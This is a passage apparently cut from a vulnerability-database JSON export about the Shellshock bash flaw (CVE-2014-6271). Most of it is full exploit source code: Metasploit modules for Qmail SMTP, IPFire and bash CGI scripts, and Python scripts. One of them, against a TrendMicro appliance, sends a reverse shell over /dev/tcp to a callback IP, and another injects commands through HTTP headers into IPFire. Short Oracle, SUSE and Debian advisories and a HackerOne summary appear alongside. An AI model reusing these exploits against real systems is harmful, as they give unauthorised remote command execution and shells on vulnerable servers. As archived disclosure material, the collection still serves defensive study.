end\r\n \r\n def send_command(username, cmd)\r\n cmd = \"() { :;}; #{datastore['RPATH']}/sh -c \\\"#{cmd}\\\"\"\r\n connect\r\n send_user(username)\r\n password_result = send_pass(cmd)\r\n disconnect\r\n password_result\r\n end\r\nend\n\n# 0day.today [2018-03-09] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22713"}, {"lastseen": "2018-04-14T13:50:34", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a shellshock vulnerability on Qmail, a public domain MTA written in C that runs on Unix systems. Due to the lack of validation on the MAIL FROM field, it is possible to execute shell code on a system with a vulnerable BASH (Shellshock). This flaw works on the latest Qmail versions (qmail-1.03 and netqmail-1.06). However, in order to execute code, /bin/sh has to be linked to bash (usually default configuration) and a valid recipient must be set on the RCPT TO field (usually [email\u00a0protected]). The exploit does not work on the \"qmailrocks\" community version as it ensures the MAILFROM field is well-formed.", "modified": "2017-09-30T00:00:00", "published": "2017-09-30T00:00:00", "href": "https://0day.today/exploit/description/28706", "id": "1337DAY-ID-28706", "type": "zdt", "title": "Qmail SMTP Bash Environment Variable Injection (Shellshock) Exploit", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::Smtp\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Qmail SMTP Bash Environment Variable Injection (Shellshock)',\r\n 'Description' => %q{\r\n This module exploits a shellshock vulnerability on Qmail, a public\r\n domain MTA written in C that runs on Unix systems.\r\n Due to the lack of validation on the MAIL FROM field, it is possible to\r\n execute shell code on a system with a vulnerable BASH (Shellshock).\r\n This flaw works on the latest Qmail versions (qmail-1.03 and\r\n netqmail-1.06).\r\n However, in order to execute code, /bin/sh has to be linked to bash\r\n (usually default configuration) and a valid recipient must be set on the\r\n RCPT TO field (usually [email\u00a0protected]).\r\n The exploit does not work on the \"qmailrocks\" community version\r\n as it ensures the MAILFROM field is well-formed.\r\n },\r\n 'Author' =>\r\n [\r\n 'Mario Ledo (Metasploit module)',\r\n 'Gabriel Follon (Metasploit module)',\r\n 'Kyle George (Vulnerability discovery)'\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['unix'],\r\n 'Arch' => ARCH_CMD,\r\n 'References' =>\r\n [\r\n ['CVE', '2014-6271'],\r\n ['CWE', '94'],\r\n ['OSVDB', '112004'],\r\n ['EDB', '34765'],\r\n ['URL', 'http://seclists.org/oss-sec/2014/q3/649'],\r\n ['URL', 'https://lists.gt.net/qmail/users/138578']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x3e\",\r\n 'Space' => 888,\r\n 'DisableNops' => true,\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic telnet perl ruby python'\r\n # telnet ruby python and perl works only if installed on target\r\n }\r\n },\r\n 'Targets' => [ [ 'Automatic', { }] ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Sep 24 2014'\r\n ))\r\n\r\n deregister_options('MAILFROM')\r\n end\r\n\r\n def smtp_send(data = nil)\r\n begin\r\n result = ''\r\n code = 0\r\n sock.put(\"#{data}\")\r\n result = sock.get_once\r\n result.chomp! if (result)\r\n code = result[0..2].to_i if result\r\n return result, code\r\n rescue Rex::ConnectionError, Errno::ECONNRESET, ::EOFError\r\n return result, 0\r\n rescue ::Exception => e\r\n print_error(\"#{rhost}:#{rport} Error smtp_send: '#{e.class}' '#{e}'\")\r\n return nil, 0\r\n end\r\n end\r\n\r\n def exploit\r\n to = datastore['MAILTO']\r\n connect\r\n result = smtp_send(\"HELO localhost\\r\\n\")\r\n if result[1] < 200 || result[1] > 300\r\n fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))\r\n end\r\n print_status('Sending the payload...')\r\n result = smtp_send(\"mail from:<() { :; }; \" + payload.encoded.gsub!(/\\\\/, '\\\\\\\\\\\\\\\\') + \">\\r\\n\")\r\n if result[1] < 200 || result[1] > 300\r\n fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))\r\n end\r\n print_status(\"Sending RCPT TO #{to}\")\r\n result = smtp_send(\"rcpt to:<#{to}>\\r\\n\")\r\n if result[1] < 200 || result[1] > 300\r\n fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))\r\n end\r\n result = smtp_send(\"data\\r\\n\")\r\n if result[1] < 200 || result[1] > 354\r\n fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))\r\n end\r\n result = smtp_send(\"data\\r\\n\\r\\nfoo\\r\\n\\r\\n.\\r\\n\")\r\n if result[1] < 200 || result[1] > 300\r\n fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))\r\n end\r\n disconnect\r\n end\r\nend\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/28706", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-10-21T21:29:23", "bulletinFamily": "exploit", "description": "TrendMicro InterScan Web Security Virtual Appliance - Remote Code Execution (Shellshock). CVE-2014-6271. Remote exploit for Hardware platform", "modified": "2016-10-21T00:00:00", "published": "2016-10-21T00:00:00", "id": "EDB-ID:40619", "href": "https://www.exploit-db.com/exploits/40619/", "type": "exploitdb", "title": "TrendMicro InterScan Web Security Virtual Appliance - Remote Code Execution (Shellshock)", "sourceData": "#!/usr/bin/env python\r\n# TrendMicro InterScan Web Security Virtul Appliance\r\n# ==================================================\r\n# InterScan Web Security is a software virtual appliance that \r\n# dynamically protects against the ever-growing flood of web \r\n# threats at the Internet gateway exclusively designed to secure \r\n# you against traditional and emerging web threats at the Internet \r\n# gateway. The appliance however is shipped with a vulnerable\r\n# version of Bash susceptible to shellshock (I know right?). An\r\n# attacker can exploit this vulnerability by calling the CGI\r\n# shellscript \"/cgi-bin/cgiCmdNotify\" which can be exploited\r\n# to perform arbitrary code execution. A limitation of this \r\n# vulnerability is that the attacker must have credentials for\r\n# the admin web interface to exploit this flaw. The panel runs\r\n# over HTTP by default so a man-in-the-middle attack could be\r\n# used to gain credentials and compromise the appliance.\r\n# \r\n# $ python trendmicro_IWSVA_shellshock.py 192.168.56.101 admin password 192.168.56.1\r\n# [+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit\r\n# [-] Authenticating to '192.168.56.101' with 'admin' 'password'\r\n# [-] JSESSIONID = DDE38E62757ADC00A51311F1F953EEBA\r\n# [-] exploiting shellshock CVE-2014-6271...\r\n# bash: no job control in this shell\r\n# bash-4.1$ id\r\n# uid=498(iscan) gid=499(iscan) groups=499(iscan)\r\n# \r\n# -- Hacker Fantastic \r\n#\r\n# (https://www.myhackerhouse.com)\r\nimport SimpleHTTPServer\r\nimport subprocess\r\nimport requests\r\nimport sys\r\nimport os\r\n\r\ndef spawn_listener():\r\n\tos.system(\"nc -l 8080\")\r\n\r\ndef shellshock(ip,session,cbip):\r\n\tuser_agent = {'User-agent': '() { :; }; /bin/bash -i >& /dev/tcp/'+cbip+'/8080 0>&1'}\r\n\tcookies = {'JSESSIONID': session}\r\n\tprint \"[-] exploiting shellshock CVE-2014-6271...\"\r\n\tmyreq = requests.get(\"http://\"+ip+\":1812/cgi-bin/cgiCmdNotify\", headers = user_agent, cookies = cookies)\r\n\r\ndef login_http(ip,user,password):\r\n\tmydata = {'wherefrom':'','wronglogon':'no','uid':user, 'passwd':password,'pwd':'Log+On'}\r\n\tprint \"[-] Authenticating to '%s' with '%s' '%s'\" % (ip,user,password)\r\n\tmyreq = requests.post(\"http://\"+ip+\":1812/uilogonsubmit.jsp\", data=mydata)\t\r\n\tsession_cookie = myreq.history[0].cookies.get('JSESSIONID')\r\n\tprint \"[-] JSESSIONID = %s\" % session_cookie \r\n\treturn session_cookie\r\n\r\nif __name__ == \"__main__\":\r\n\tprint \"[+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit\"\r\n\tif len(sys.argv) < 5:\r\n\t\tprint \"[-] use with <ip> <user> <pass> <connectback_ip>\"\r\n\t\tsys.exit()\r\n\tnewRef=os.fork()\r\n \tif newRef==0:\r\n\t\tspawn_listener()\r\n \telse:\r\n\t\tsession = login_http(sys.argv[1],sys.argv[2],sys.argv[3])\r\n\t\tshellshock(sys.argv[1],session,sys.argv[4])\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40619/"}, {"lastseen": "2017-10-02T19:53:38", "bulletinFamily": "exploit", "description": "Qmail SMTP - Bash Environment Variable Injection (Metasploit). CVE-2014-6271. Remote exploit for Linux platform. Tags: Metasploit Framework", "modified": "2017-10-02T00:00:00", "published": "2017-10-02T00:00:00", "id": "EDB-ID:42938", "href": "https://www.exploit-db.com/exploits/42938/", "type": "exploitdb", "title": "Qmail SMTP - Bash Environment Variable Injection (Metasploit)", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::Smtp\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Qmail SMTP Bash Environment Variable Injection (Shellshock)',\r\n 'Description' => %q{\r\n This module exploits a shellshock vulnerability on Qmail, a public\r\n domain MTA written in C that runs on Unix systems.\r\n Due to the lack of validation on the MAIL FROM field, it is possible to\r\n execute shell code on a system with a vulnerable BASH (Shellshock).\r\n This flaw works on the latest Qmail versions (qmail-1.03 and\r\n netqmail-1.06).\r\n However, in order to execute code, /bin/sh has to be linked to bash\r\n (usually default configuration) and a valid recipient must be set on the\r\n RCPT TO field (usually admin@exampledomain.com).\r\n The exploit does not work on the \"qmailrocks\" community version\r\n as it ensures the MAILFROM field is well-formed.\r\n },\r\n 'Author' =>\r\n [\r\n 'Mario Ledo (Metasploit module)',\r\n 'Gabriel Follon (Metasploit module)',\r\n 'Kyle George (Vulnerability discovery)'\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['unix'],\r\n 'Arch' => ARCH_CMD,\r\n 'References' =>\r\n [\r\n ['CVE', '2014-6271'],\r\n ['CWE', '94'],\r\n ['OSVDB', '112004'],\r\n ['EDB', '34765'],\r\n ['URL', 'http://seclists.org/oss-sec/2014/q3/649'],\r\n ['URL', 'https://lists.gt.net/qmail/users/138578']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x3e\",\r\n 'Space' => 888,\r\n 'DisableNops' => true,\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic telnet perl ruby python'\r\n # telnet ruby python and perl works only if installed on target\r\n }\r\n },\r\n 'Targets' => [ [ 'Automatic', { }] ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Sep 24 2014'\r\n ))\r\n\r\n deregister_options('MAILFROM')\r\n end\r\n\r\n def smtp_send(data = nil)\r\n begin\r\n result = ''\r\n code = 0\r\n sock.put(\"#{data}\")\r\n result = sock.get_once\r\n result.chomp! if (result)\r\n code = result[0..2].to_i if result\r\n return result, code\r\n rescue Rex::ConnectionError, Errno::ECONNRESET, ::EOFError\r\n return result, 0\r\n rescue ::Exception => e\r\n print_error(\"#{rhost}:#{rport} Error smtp_send: '#{e.class}' '#{e}'\")\r\n return nil, 0\r\n end\r\n end\r\n\r\n def exploit\r\n to = datastore['MAILTO']\r\n connect\r\n result = smtp_send(\"HELO localhost\\r\\n\")\r\n if result[1] < 200 || result[1] > 300\r\n fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))\r\n end\r\n print_status('Sending the payload...')\r\n result = smtp_send(\"mail from:<() { :; }; \" + payload.encoded.gsub!(/\\\\/, '\\\\\\\\\\\\\\\\') + \">\\r\\n\")\r\n if result[1] < 200 || result[1] > 300\r\n fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))\r\n end\r\n print_status(\"Sending RCPT TO #{to}\")\r\n result = smtp_send(\"rcpt to:<#{to}>\\r\\n\")\r\n if result[1] < 200 || result[1] > 300\r\n fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))\r\n end\r\n result = smtp_send(\"data\\r\\n\")\r\n if result[1] < 200 || result[1] > 354\r\n fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))\r\n end\r\n result = smtp_send(\"data\\r\\n\\r\\nfoo\\r\\n\\r\\n.\\r\\n\")\r\n if result[1] < 200 || result[1] > 300\r\n fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))\r\n end\r\n disconnect\r\n end\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/42938/"}, {"lastseen": "2016-06-11T00:53:29", "bulletinFamily": "exploit", "description": "IPFire Bash Environment Variable Injection (Shellshock). CVE-2014-6271. Remote exploit for cgi platform", "modified": "2016-06-10T00:00:00", "published": "2016-06-10T00:00:00", "id": "EDB-ID:39918", "href": "https://www.exploit-db.com/exploits/39918/", "type": "exploitdb", "title": "IPFire Bash Environment Variable Injection Shellshock", "sourceData": "##\r\n## This module requires Metasploit: http://metasploit.com/download\r\n## Current source: https://github.com/rapid7/metasploit-framework\r\n###\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'IPFire Bash Environment Variable Injection (Shellshock)',\r\n 'Description' => %q(\r\n IPFire, a free linux based open source firewall distribution,\r\n version <= 2.15 Update Core 82 contains an authenticated remote\r\n command execution vulnerability via shellshock in the request headers.\r\n ),\r\n 'Author' =>\r\n [\r\n 'h00die <mike@stcyrsecurity.com>', # module\r\n 'Claudio Viviani' # discovery\r\n ],\r\n 'References' =>\r\n [\r\n [ 'EDB', '34839' ],\r\n [ 'CVE', '2014-6271']\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => %w( linux unix ),\r\n 'Privileged' => false,\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => true,\r\n 'PAYLOAD' => 'cmd/unix/generic'\r\n },\r\n 'Arch' => ARCH_CMD,\r\n 'Payload' =>\r\n {\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic'\r\n }\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Automatic Target', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Sep 29 2014'\r\n )\r\n )\r\n\r\n register_options(\r\n [\r\n OptString.new('USERNAME', [ true, 'User to login with', 'admin']),\r\n OptString.new('PASSWORD', [ false, 'Password to login with', '']),\r\n Opt::RPORT(444)\r\n ], self.class\r\n )\r\n end\r\n\r\n def check\r\n begin\r\n res = send_request_cgi(\r\n 'uri' => '/cgi-bin/index.cgi',\r\n 'method' => 'GET'\r\n )\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Could not connect to web service - no response\") if res.nil?\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Invalid credentials (response code: #{res.code})\") if res.code == 401\r\n /\\<strong\\>IPFire (?<version>[\\d.]{4}) \\([\\w]+\\) - Core Update (?<update>[\\d]+)/ =~ res.body\r\n\r\n if version && update && version == \"2.15\" && update.to_i < 83\r\n Exploit::CheckCode::Appears\r\n else\r\n Exploit::CheckCode::Safe\r\n end\r\n rescue ::Rex::ConnectionError\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect to the web service\")\r\n end\r\n end\r\n\r\n #\r\n # CVE-2014-6271\r\n #\r\n def cve_2014_6271(cmd)\r\n %{() { :;}; /bin/bash -c \"#{cmd}\" }\r\n end\r\n\r\n def exploit\r\n begin\r\n payload = cve_2014_6271(datastore['CMD'])\r\n vprint_status(\"Exploiting with payload: #{payload}\")\r\n res = send_request_cgi(\r\n 'uri' => '/cgi-bin/index.cgi',\r\n 'method' => 'GET',\r\n 'headers' => { 'VULN' => payload }\r\n )\r\n\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Could not connect to web service - no response\") if res.nil?\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Invalid credentials (response code: #{res.code})\") if res.code == 401\r\n /<li>Device: \\/dev\\/(?<output>.+) reports/m =~ res.body\r\n print_good(output) unless output.nil?\r\n\r\n rescue ::Rex::ConnectionError\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect to the web service\")\r\n end\r\n end\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/39918/"}], "oraclelinux": [{"lastseen": "2018-08-31T01:46:53", "bulletinFamily": "unix", "description": "[4.1.2-15.1] \n- Check for fishy environment\n Resolves: #1141645", "modified": "2014-09-24T00:00:00", "published": "2014-09-24T00:00:00", "id": "ELSA-2014-1293", "href": "http://linux.oracle.com/errata/ELSA-2014-1293.html", "title": "bash security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:48:03", "bulletinFamily": "unix", "description": "[3.0-27.0.1]\n- Check for fishy environment (Ondrej Oprala)\n Resolves: #1141644", "modified": "2014-09-24T00:00:00", "published": "2014-09-24T00:00:00", "id": "ELSA-2014-1294", "href": "http://linux.oracle.com/errata/ELSA-2014-1294.html", "title": "bash security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:39:22", "bulletinFamily": "unix", "description": "This update fixes a bug in the bash shell that allows an attacker to\n execute arbitrary commands upon shell invocation if he can control the\n shell's environment. This is particularly dangerous if the shell is used\n as a cgi interpreter for a web server, or if the shell handles untrusted\n input inherited in the environment from other sources.\n\n", "modified": "2014-09-28T12:09:20", "published": "2014-09-28T12:09:20", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00040.html", "id": "OPENSUSE-SU-2014:1238-1", "title": "Important security fix for bash that allows the injection of commands. (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:46:24", "bulletinFamily": "unix", "description": "bash was updated to fix unexpected code execution with environment\n variables (CVE-2014-6271).\n\n", "modified": "2014-09-30T17:06:26", "published": "2014-09-30T17:06:26", "id": "SUSE-SU-2014:1260-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00049.html", "type": "suse", "title": "bash (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:09:50", "bulletinFamily": "unix", "description": "bash has been updated to fix a critical security issue.\n\n In some circumstances, the shell would evaluate shellcode in environment\n variables passed at startup time. This allowed code execution by local or\n remote attackers who could pass environment variables to bash scripts.\n (CVE-2014-6271)\n\n Security Issues:\n\n * CVE-2014-6271\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271</a>>\n\n", "modified": "2014-09-27T01:04:16", "published": "2014-09-27T01:04:16", "id": "SUSE-SU-2014:1223-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00034.html", "title": "Security update for bash (critical)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2018-10-18T13:50:26", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3032-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nSeptember 24, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : bash\nCVE ID : CVE-2014-6271\n\nStephane Chazelas discovered a vulnerability in bash, the GNU\nBourne-Again Shell, related to how environment variables are\nprocessed. In many common configurations, this vulnerability is\nexploitable over the network, especially if bash has been configured\nas the system shell.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 4.2+dfsg-0.1+deb7u1.\n\nWe recommend that you upgrade your bash packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2014-09-24T14:06:32", "published": "2014-09-24T14:06:32", "id": "DEBIAN:DSA-3032-1:EB739", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00220.html", "title": "[SECURITY] [DSA 3032-1] bash security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "hackerone": [{"lastseen": "2018-08-31T00:39:16", "bulletinFamily": "bugbounty", "bounty": 20000.0, "description": "GNU Bash versions 1.14 through 4.3 contain a flaw that processes commands placed after function definitions in the added environment variable, allowing remote attackers to execute arbitrary code via a crafted environment which enables network-based exploitation. \n\nOriginal disclosure: http://www.openwall.com/lists/oss-security/2014/09/24/11\n\nDetailed analysis by lcamtuf:\n- http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html\n- http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html\n", "modified": "2014-10-01T00:00:00", "published": "2014-09-24T00:00:00", "id": "H1:29839", "href": "https://hackerone.com/reports/29839", "title": "The Internet: GNU Bourne-Again Shell (Bash) 'Shellshock' Vulnerability", "type": "hackerone", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T13:12:40", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-09-29T00:00:00", "published": "2014-09-29T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87270", "id": "SSV:87270", "type": "seebug", "title": "GNU bash Environment Variable Command Injection (MSF)", "sourceData": "\n require 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Auxiliary\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'bashedCgi',\r\n 'Description' => %q{\r\n Quick & dirty module to send the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command.\r\n },\r\n 'Author' =>\r\n [\r\n 'Stephane Chazelas', # vuln discovery\r\n 'Shaun Colley <scolley at ioactive.com>' # metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' => [ 'CVE', '2014-6271' ],\r\n 'Targets' =>\r\n [\r\n [ 'cgi', {} ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Payload' =>\r\n {\r\n 'Space' => 1024,\r\n 'DisableNops' => true\r\n },\r\n 'DefaultOptions' => { 'PAYLOAD' => 0 }\r\n ))\r\n \r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Absolute path of BASH-based CGI', '/']),\r\n OptString.new('CMD', [true, 'Command to execute', '/usr/bin/touch /tmp/metasploit'])\r\n ], self.class)\r\n end\r\n \r\n def run\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => datastore['TARGETURI'],\r\n 'agent' => "() { :;}; " + datastore['CMD']\r\n })\r\n \r\n if res && res.code == 200\r\n print_good("Command sent - 200 received")\r\n else\r\n print_error("Command sent - non-200 reponse")\r\n end\r\n end\r\nend\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87270", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T13:11:54", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-10-10T00:00:00", "published": "2014-10-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87294", "id": "SSV:87294", "type": "seebug", "title": "IPFire Cgi Web Interface Authenticated Bash Environment Variable Code Injection exploit", "sourceData": "\n #!/usr/bin/env python\r\n#\r\n# Exploit Title : IPFire <= 2.15 core 82 Authenticated cgi Remote Command Injection (ShellShock)\r\n#\r\n# Exploit Author : Claudio Viviani\r\n#\r\n# Vendor Homepage : http://www.ipfire.org\r\n#\r\n# Software Link: http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso\r\n#\r\n# Date : 2014-09-29\r\n#\r\n# Fixed version: IPFire 2.15 core 83 (2014-09-28)\r\n#\r\n# Info: IPFire is a free Linux distribution which acts as a router and firewall in the first instance.\r\n# It can be maintained via a web interface.\r\n# The distribution furthermore offers selected server-daemons and can easily be expanded to a SOHO-server.\r\n# IPFire is based on Linux From Scratch and is, like the Endian Firewall, originally a fork from IPCop.\r\n#\r\n# Vulnerability: IPFire <= 2.15 core 82 Cgi Web Interface suffers from Authenticated Bash Environment Variable Code Injection\r\n# (CVE-2014-6271)\r\n#\r\n# Suggestion:\r\n#\r\n# If you can't update the distro and you have installed ipfire via image files (Arm, Flash)\r\n# make sure to change the default access permission to graphical user interface (user:admin pass:ipfire)\r\n#\r\n#\r\n# http connection\r\nimport urllib2\r\n# Basic Auth management Base64\r\nimport base64\r\n# Args management\r\nimport optparse\r\n# Error management\r\nimport sys\r\n \r\nbanner = """\r\n ___ _______ _______ __ _______ __\r\n | | _ | _ |__.----.-----. | _ .-----|__|\r\n |. |. 1 |. 1___| | _| -__| |. 1___| _ | |\r\n |. |. ____|. __) |__|__| |_____| |. |___|___ |__|\r\n |: |: | |: | |: 1 |_____|\r\n |::.|::.| |::.| |::.. . |\r\n `---`---' `---' `-------'\r\n _______ __ __ __ _______ __ __\r\n | _ | |--.-----| | | _ | |--.-----.----| |--.\r\n | 1___| | -__| | | 1___| | _ | __| <\r\n |____ |__|__|_____|__|__|____ |__|__|_____|____|__|__|\r\n |: 1 | |: 1 |\r\n |::.. . | |::.. . |\r\n `-------' `-------'\r\n \r\n IPFire <= 2.15 c0re 82 Authenticated\r\n Cgi Sh3llSh0ck r3m0t3 C0mm4nd Inj3ct10n\r\n \r\n Written by:\r\n \r\n Claudio Viviani\r\n \r\n http://www.homelab.it\r\n \r\n info@homelab.it\r\n homelabit@protonmail.ch\r\n \r\n https://www.facebook.com/homelabit\r\n https://twitter.com/homelabit\r\n https://plus.google.com/+HomelabIt1/\r\n https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww\r\n"""\r\n \r\n# Check url\r\ndef checkurl(url):\r\n if url[:8] != "https://" and url[:7] != "http://":\r\n print('[X] You must insert http:// or https:// procotol')\r\n sys.exit(1)\r\n else:\r\n return url\r\n \r\ndef connectionScan(url,user,pwd,cmd):\r\n print '[+] Connection in progress...'\r\n try:\r\n response = urllib2.Request(url)\r\n content = urllib2.urlopen(response)\r\n print '[X] IPFire Basic Authentication not found'\r\n except urllib2.HTTPError, e:\r\n if e.code == 404:\r\n print '[X] Page not found'\r\n elif e.code == 401:\r\n try:\r\n print '[+] Authentication in progress...'\r\n base64string = base64.encodestring('%s:%s' % (user, pwd)).replace('\\n', '')\r\n headers = {'VULN' : '() { :;}; echo "H0m3l4b1t"; /bin/bash -c "'+cmd+'"' }\r\n response = urllib2.Request(url, None, headers)\r\n response.add_header("Authorization", "Basic %s" % base64string)\r\n content = urllib2.urlopen(response).read()\r\n if "ipfire" in content:\r\n print '[+] Username & Password: OK'\r\n print '[+] Checking for vulnerability...'\r\n if 'H0m3l4b1t' in content:\r\n print '[!] Command "'+cmd+'": INJECTED!'\r\n else:\r\n print '[X] Not Vulnerable :('\r\n else:\r\n print '[X] No IPFire page found'\r\n except urllib2.HTTPError, e:\r\n if e.code == 401:\r\n print '[X] Wrong username or password'\r\n else:\r\n print '[X] HTTP Error: '+str(e.code)\r\n except urllib2.URLError:\r\n print '[X] Connection Error'\r\n else:\r\n print '[X] HTTP Error: '+str(e.code)\r\n except urllib2.URLError:\r\n print '[X] Connection Error'\r\n \r\ncommandList = optparse.OptionParser('usage: %prog -t https://target:444/ -u admin -p pwd -c "touch /tmp/test.txt"')\r\ncommandList.add_option('-t', '--target', action="store",\r\n help="Insert TARGET URL",\r\n )\r\ncommandList.add_option('-c', '--cmd', action="store",\r\n help="Insert command name",\r\n )\r\ncommandList.add_option('-u', '--user', action="store",\r\n help="Insert username",\r\n )\r\ncommandList.add_option('-p', '--pwd', action="store",\r\n help="Insert password",\r\n )\r\noptions, remainder = commandList.parse_args()\r\n \r\n# Check args\r\nif not options.target or not options.cmd or not options.user or not options.pwd:\r\n print(banner)\r\n commandList.print_help()\r\n sys.exit(1)\r\n 